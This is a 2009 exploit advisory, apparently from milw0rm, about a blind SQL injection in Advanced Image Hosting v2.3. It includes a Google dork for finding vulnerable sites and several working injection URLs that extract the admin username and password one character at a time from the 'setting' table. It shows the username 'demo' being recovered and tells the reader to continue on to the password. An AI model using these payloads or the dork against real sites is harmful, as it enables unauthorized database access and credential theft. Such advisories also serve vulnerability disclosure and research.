################################################################### Advanced Image Hosting (AIH) Remote Blind SQL Injection ################################################################### ################################################### #[~] Author : boom3rang #[~] Greetz : H!tm@N, KHG, chs, redc00de #[~] Vulnerability : Blind SQL injection #[~] Google Dork : Powered by: AIH v2.3 -------------------------------------------------- #[!] Product Name : Advanced Image Hosting #[!] Product Site : http://www.yabsoft.info #[!] Version : v2.3 #[!] Download : http://yabsoft.com/aihs-feature.php ################################################### [!] AIH Blind SQL Injection. PoC / Live Demo: ------------- http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++ First charcter of the username is char(100) --> char="d" ------------- http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++ Second charter of the username is char(101) --> char2="e" ------------- http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++ Next charter of the username is char(109) --> char3="m" ------------- http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++ And The last charter of the username is char(111) --> char4="o" ------------- Like we see the username is "demo" now you can continue finding another charters for password, changing the number of charters 5,6,7,8,9,10........?> ############################## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ############################## # milw0rm.com [2009-03-18]